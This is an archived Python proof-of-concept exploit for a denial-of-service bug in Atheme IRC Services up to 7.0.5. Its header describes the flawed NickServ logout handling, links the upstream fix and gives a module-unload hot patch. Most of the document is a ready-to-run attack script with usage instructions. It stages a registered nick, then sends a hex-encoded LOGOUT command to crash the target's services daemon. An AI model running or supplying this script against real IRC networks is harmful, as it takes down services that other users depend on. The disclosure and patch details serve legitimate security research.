Atheme IRC Services 7.0.5 Denial Of Service

`#!/usr/bin/python3  
###################################################################################  
# Monday, January 13, 2013  
#  
#  
#  
# _ _ .__ .__   
# __| || |_| | ____ ____ |__| ____ ____   
# \ __ / | _/ __ \ / ___\| |/ _ \ / \   
# | || || |_\ ___// /_/ > ( <_> ) | \  
# /_ ~~ _\____/\___ >___ /|__|\____/|___| /  
# |_||_| \/_____/ \/  
# http://www.zempirians.com  
#  
# 00100011 01101100 01100101 01100111 01101001 01101111 01101110  
#  
#   
#  
# -=[ Atheme - IRC Services Daemon ] =-  
#   
# [P]roof [o]f [C]oncept, Denial of Service  
#  
#  
#  
#  
###################################################################################  
# # T E A M #  
# #######################  
#  
# O_O .....> Sent To Play All Alone <3  
# UberLame .....> For Providing More Sweet, Sweet Cycles  
# Aph3x .....> For Being Awesome  
# Apetrick .....> For Not Letting Me Play With Him  
#  
###################################################################################  
#  
# ~~! SHOUT OUTS !~~  
#  
# a heyoz Eurydemus  
# nikka l1nd BinaryTENSHi  
# syk Gatsby  
#  
# ~~! Special Thanks !~~  
#  
# Packet Storm Security (www.packetstormsecurity.com) for archiving our  
# concepts in order to help secure and educate those who read them.  
#  
###################################################################################  
# SUMMARY #  
################  
#  
# Bug Fix: [12/20/12]: https://github.com/atheme/atheme/commit/1aaa9e8f1d0b0b67b36c2a6318c71beaa7f39194  
#  
# Improper implementation of the logout command, results in a segfault  
# when an unauthenticated user tries to deauth another authenticated user.  
#  
################  
# VULNERABLE #  
################  
#  
# Atheme Services up to 7.0.5 [and with logout.c loaded (by default)]  
#  
################  
# CVE #  
################  
#  
# [ No CVE Has Been Reported ]  
#  
################  
# PATCH #  
################   
#  
# - Proper Fix  
# - Update To Current Version From GitHub   
#  
# - Hot Patch  
# - Unload nickserv/logout  
# > /quote operserv modunload nickserv/logout  
# $ !services.global! Module nickserv/logout unloaded.  
# $ -OperServ- Module nickserv/logout unloaded.  
#  
###################################################################################  
# # #  
# # H O W - T O #  
# # #  
# #######################  
#  
# Provide the Target: Server, Nickname, Password and Optionally the Port, and the  
# script will deliver the staged payload...  
#  
# [!USE/]$ ./<file>.py -t <server> -P <port> -n <nickname> -p <password>   
#  
###################################################################################  
from argparse import ArgumentParser  
import socket  
  
# DIRTY HACK TO CONVERT STRINGS TO HEX  
def toHex( string_data ):  
return ''.join(''.join([ hex( ord( ch ) ) for ch in string_data ]).split( '0x' ))  
  
def deploy( sock, target, port, nick, passwd ):  
try:  
sock.connect(( target, int( port ) ))  
except:  
print( "\t[-] Payload Deployment Failed!" )  
exit()  
  
sock.send( b'\x4e\x49\x43\x4b\x20\x5f\x7a\x65\x6d\x70\x30\x64\x61\x79\x5f\x0d\x0a' )  
sock.send( b'\x55\x53\x45\x52\x20\x7a\x65\x6d\x70\x30\x64\x61\x79\x20\x48\x45' + \  
b'\x48\x45\x20\x48\x45\x48\x45\x20\x3a\x6f\x68\x61\x69\x20\x3c\x33' + \  
b'\x0d\x0a' )  
  
while True:  
host_data = str( sock.recv(4096).strip() )  
  
if ' 396 ' in host_data:  
sock.send( bytes.fromhex( '505249564d5347204e49434b53455256203a4c4f474f555420{}20{}0d0a'.format( \  
toHex( nick ), toHex( passwd ) ) ) )  
  
print( '\t[+] Payload Deployed! <3' )  
break  
  
  
sock.send( b'\x51\x55\x49\x54\x0d\x0a' )  
return sock.close()  
  
def stage( target, port, nick, passwd ):  
sock = socket.socket( socket.AF_INET, socket.SOCK_STREAM )  
p_sock = socket.socket( socket.AF_INET, socket.SOCK_STREAM )  
  
try:  
sock.connect(( target, int( port ) ))  
except:  
print( "[-] Failed To Connect To {}".format( target ) )  
exit()  
  
sock.send( bytes.fromhex( '4e49434b20{}0d0a'.format( toHex( nick ) ) ) )  
sock.send( b'\x55\x53\x45\x52\x20\x7a\x65\x6d\x70\x30\x64\x61\x79\x20\x48' + \  
b'\x45\x48\x45\x20\x48\x45\x48\x45\x20\x3a\x6f\x68\x61\x69\x20' + \  
b'\x3c\x33\x0d\x0a' )  
  
while True:  
host_data = str( sock.recv( 8096 ).strip() )  
  
if ' 396 ' in host_data:  
sock.send( bytes.fromhex( '505249564d5347204e49434b53455256203a524547495354455220' + \  
'{}2064657673407a656d70697269616e732e636f6d0d0a0d0a'.format( toHex( passwd ) ) ) )  
  
sock.send( bytes.fromhex( '505249564d5347204e49434b53455256203a4944454e5449465920{}0d0a'.format( toHex( passwd ) ) ) )  
  
print( '\t[+] Staging Successful, Deploying Payload Against Target {}'.format( target ) )  
deploy( p_sock, target, port, nick, passwd )  
break  
  
try:  
msg = host_data.split()  
if msg[0].lower() is 'ping':  
sock.send( b"PONG {}\r\n".format( msg[1] ) )  
except:  
pass  
  
sock.send( b'\x51\x55\x49\x54\x0d\x0a' )  
sock.close()  
  
  
if __name__ == '__main__':  
parser = ArgumentParser( description='#legion Atheme IRC Services DoS' )  
  
parser.add_argument( '-t', '--target', dest='target', help='IRCD Server To Connect On' )  
parser.add_argument( '-P', '--port', dest='port', default=6667, help='Port To Connect On' )  
  
parser.add_argument( '-n', '--nick', dest='nick', default='zemp0day', help='Nick To Use' )  
parser.add_argument( '-p', '--pass', dest='passwd', default='yad0pmez', help='Password To Use' )  
  
args = parser.parse_args()  
  
if args.target is None:  
parser.print_help()  
exit()  
  
stage( args.target, args.port, args.nick, args.passwd )  
`